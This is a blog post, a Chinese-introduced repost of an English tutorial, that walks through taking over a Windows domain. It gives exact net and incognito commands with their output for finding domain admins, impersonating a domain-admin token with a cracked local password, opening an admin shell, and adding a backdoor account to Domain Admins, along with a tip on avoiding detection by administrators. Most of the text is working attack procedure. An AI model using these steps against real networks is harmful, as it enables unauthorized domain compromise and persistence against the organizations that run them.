How to attack a windows domain

http://baoz.net/how-to-attack-a-windows-domain/

今天在幻影的邮件列表里看到有人说到how to attack a windows domain这个文章，google了一把看了下，这东西也太强了，我有点不相信自己的眼睛，文末的三个文章应该描述到了他的原理，建议搞渗透的同学仔细研究下。

Get administrator rights on a workstation which is on a windows domain using whatever method you can find. (exploit, stolen password, smbrelay, phishing, etc). Look for the domain server. There are a variety of ways to do this. You can arp -a to find active IP’s or ping scan the network and then use the nbtstat tool to look for the right domain controller identifier or an obvious hostname.

You can also browse the network neighborhood or use the net view command.

Aquiring and cracking the hashes of your target is generally useful as well.

Enumerate group membership so you know who to target.

Get the usernames in the local administrators group:

C:WINDOWSsystem32>net localgroup administrators

net localgroup administrators

Alias name  administrators

Comment     Administrators have complete and unrestricted access to the computer/domain


Members

--------------------------------------

Administrator

BLACKHATDomain Admins

hacked

local_valsmith

root

The command completed successfully.

Enumerate the domain admins

C:WINDOWSsystem32>net group "domain admins" /domain

net group "domain admins" /domain

The request will be processed at a domain controller for domain blackhat.com.


Group name   Domain Admins

Comment      Designated administrators of the domain


Members


---------------------------------------------------

admin_valsmith      Administrator

The command completed successfully.

So admin_valsmith is our target domain admin. Lets say the workstation we hacked is on 172.16.1.10. We now need to find out of there are any security tokens we can access.

c:incognito>incognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 list_tokens -u

[*] Attempting to establish new connection to /172.16.1.10IPC$

[*] Logon to /172.16.1.10IPC$ succeeded

[*] Copying service to /172.16.1.10

[+] Existing service found and opend successfully

[*] Starting service

[+] Service started

[*] Connecting to incognito service named pipe

[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-FC12020A7EED}

[*] Redirecting I/O to remote process


[*] Enumerating tokens

[*] Listing unique users found...


Delegation Tokens Available

==========================================

NT AUTHORITYLOCAL SERVICE

NT AUTHORITYNETWORK SERVICE

NT AUTHORITYSYSTEM

XPCLIENTlocal_valsmith


Impersonation Tokens Available

==========================================

BLACKHATadmin_valsmith

NT AUTHORITYANONYMOUS LOGON


[*] Service shutdown detected. Service executable file deleted

[*] Deleting service

So admin_valsmith is our target domain administrator and an impersonation token is available to us!

The above command assumes we have cracked the hash of the local admin and retrieved the password. This will connect to IPC$ share on the target and list any tokens that are available.

Next we will utilize this token to gain domain admin rights:

C:incognitoincognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 execute -c "blackhatadmin_valsmith" cmd


[*] Attempting to establish new connection to /172.16.1.10IPC$

[+] Logon to /172.16.1.10IPC$ succeeded

[*] Copying service to /172.16.1.10

[+] Existing service found and opend successfully

[*] Starting service

[+] Service started

[*] Connecting to incognito service named pipe

[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-9047A294CE6D}

[*] Redirecting I/O to remote process


[*] Enumerating tokens

[*] Searching for availability of requested token

[+] Requested token found

[-] No Delegation token available

[*] Attempting to create new child process and communicate via anonymous pipe

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.


C:WINDOWSsystem32>whoami

whoami

admin_valsmith

So we now have a shell with the rights of the domain administrator. We will add an account to the domain controller to demonstrate our access:

C:net user hacked 0h3ck3d! /add /domain
net user hacked 0h3cked! /add /domain
The request will be processed at a domain controller for domain blackhat.com.

The command completed successfully.

Now we want to add our account to the domain admin group. NOTE: often you don’t want to add an account, especially one named hacked as it is likely to be discovered by the admins.

C:net group "domain admins" hacked /add /domain

net group "domain admins" hacked /add /domain

The reuqest will be processed at a domain controller for domain blackhat.com


The command completed successfully.

At this point we have control over the domain and can likely log into any workstation which is on the domain.

Some further related reading:

One token to Rule them All: Post-Exploitation Fun in Windows Environments

Security implications of windows access tokens

Meta-Post_Exploitation.pdf